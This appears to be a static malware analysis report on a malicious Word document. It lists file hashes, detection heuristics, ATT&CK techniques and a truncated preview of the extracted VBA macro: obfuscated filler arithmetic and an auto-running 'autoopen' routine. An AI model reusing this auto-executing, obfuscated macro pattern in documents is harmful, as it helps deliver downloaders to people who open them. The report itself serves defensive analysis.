Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 42d21fa68553d21d…

MALICIOUS

Office (OLE)

237.1 KB Created: 2019-03-15 07:32:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: 3a9223f09e5131defda4070ddc659173 SHA-1: 6b47fab1af976b5518480caf6ce480dae1761029 SHA-256: 42d21fa68553d21d0f3e96bbbbd346212d1f139c78c5933ff6ae703368418ad6
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The presence of GetObject calls within the VBA p-code suggests an attempt to execute code or load external resources. The ClamAV detection further confirms its malicious nature, likely acting as a downloader for a secondary stage.

Heuristics 7

  • ClamAV: Doc.Malware.Droo-6895763-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Droo-6895763-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 60956 bytes
SHA-256: 58d1773ba6c26fe9bc641e3112fedd94fb4bd5dbbd967718abd23289f30e2749
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "uUAAGQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YABAXD()
   If SADUQQ = iQBAADC Then
       uAAQ_AcB = 888878741 * Z_A1GA
       mACXDGwX = KDQZ4D / 538792184 / 648401493 + 540241597 * 905772087 / 824013328 + (toXAXD - Tan(ZcDAAAA + 805681129 - 851011768 - Oct(zAUQZcBD - Hex(768606491) + 36956884 + Oct(892315431))) + (480647307 / Sqr(40570017)))
       E1XQxB = 464988884 * SUDXAkBG
End If
   If XAoxwXo = qkUUUkB Then
       JkwQAAQB = 309639586 * jBGc4D
       ZUA4Qx = dAAQAAU / 794003604 / 100734420 + 385941752 * 901536742 / 212631724 + (SoAwxc - Tan(pA_Qkw_ + 512281271 - 677824301 - Oct(NwDAAA - Hex(189007814) + 442545052 + Oct(876327097))) + (871803250 / Sqr(203362537)))
       AAABoAx = 32221473 * zBAcAX
End If
   If hADcAxG = vBZZBB4c Then
       GDCUAAxU = 855403583 * sGCDAc
       OQXDCQD = JUxAAGU / 75520102 / 698186674 + 538163502 * 667638725 / 249789112 + (qQ4AXQ - Tan(dADCDC1 + 993441065 - 838481048 - Oct(aQAA1A - Hex(986194334) + 228953373 + Oct(296958164))) + (216628725 / Sqr(447222976)))
       zZD1DZX = 176219481 * r1A_BQA
End If
   If RoXGok_B = Ox1DQUQ4 Then
       vCDZBBA = 295894980 * UCAAAw
       ScAXBXw = NwDUoZ / 209823501 / 30696457 + 381666527 * 528298984 / 681695391 + (PAD_BAw - Tan(c4xABoAk + 147684985 - 273512151 - Oct(cAkAQA - Hex(605771107) + 313793255 + Oct(769051826))) + (682560952 / Sqr(418414289)))
       iZDDAo = 310648932 * jAG4GA
End If
   If DZUB1kD = iBXAwAc Then
       wDxAkBB = 685102660 * PAAAcx
       j4x_ADD = SAXwcX / 28805962 / 924213397 + 659305860 * 305546913 / 805719473 + (l44QAA - Tan(KAAo1o + 427230615 - 465388462 - Oct(JAA_oADA - Hex(139328790) + 14449318 + Oct(519724927))) + (322441204 / Sqr(700461209)))
       bBUBk1AB = 116906929 * tDGA4_X
End If
   If zDAckAX = ZUAAAAxA Then
       bUxDAwUQ = 828576262 * qwADG1
       YDDcZZC = tAAC_Q_A / 910957438 / 7896490 + 11474067 * 754344539 / 400014959 + (RQGZUCQ - Tan(ZAAAAQ + 876080710 - 864828435 - Oct(iBU1AGQX - Hex(747469874) + 300746359 + Oct(750140348))) + (667057452 / Sqr(64534236)))
       jcA__Akw = 552311063 * LxXUkA
End If
   If TQ_BXA = LAAAAw4o Then
       OAUBGUCk = 344232585 * voQAAG
       pA_AAA = iDAc1XB / 986043874 / 563166946 + 301960935 * 807096671 / 855556357 + (CUAGA_X - Tan(ckAAxA + 580273531 - 646137033 - Oct(G1QXAoA - Hex(28541599) + 539684308 + Oct(346980475))) + (336587771 / Sqr(865762115)))
       JQQUD4 = 541918621 * E4o_AAA
End If
   If FUkAAAG = bQ1AUQBA Then
       YBAXAxZA = 491993165 * roAZBDDA
       WCkDkXZ = ZcUBD4 / 306634791 / 204146704 + 780307494 * 312953431 / 339698840 + (XAUoD1 - Tan(LAcDAoG + 111908974 - 237480094 - Oct(MU4oAxBA - Hex(270982720) + 144136245 + Oct(575722000))) + (18865400 / Sqr(706819969)))
       ZDUwAX = 839933053 * dU_AUA
End If
   If EDAA4AA = L1QAcxAD Then
       oUAxADQG = 435303769 * jAB1ADU
       RAAkoACo = AxQAAGx / 69795275 / 875219443 + 48581205 * 62254386 / 265738484 + (NQxccAAw - Tan(XQBCk4AA + 716241499 - 11720814 - Oct(vCZ441B - Hex(402114629) + 828613375 + Oct(68065683))) + (545619320 / Sqr(171020734)))
       UcA4QA = 375754650 * bkDCAAAQ
End If
End Function
Sub autoopen()
On Error Resume Next
   If lAoCAAxD = u__1AUD Then
       nDwA1A = 812616669 * YAAxQA
       qwAGCD = SDQAAAA / 416222261 / 997207107 + 394096036 * 322589883 / 519404136 + (ocDc4AG - Tan(WQDBoXDQ + 273806910 - 146596640 - Oct(ExAcQQZx - Hex(140042709) + 719667344 + Oct(235671124))) + (293120058 / Sqr(233511879)))
       ic_oA_kD = 889587650 * SwA4ADA
End If
   If joAAZAA = mAZxAD Then
       uAAQAX = 278701557 * mAA4_cB
       dBADA4 = MXDBcoA / 353977103 / 267331403 + 103246264 * 230330714 / 716065697 + (IQxQAGU - Tan(wAZAAAAB + 450182160 - 599796431 - Oct(FAAAQ4AX - Hex(889495288) + 353323007 + Oct(555858182))) + (269642298 / Sqr(901513165)))
       DQc_wC = 437399596 * ZAcD_Q
End If
... (truncated)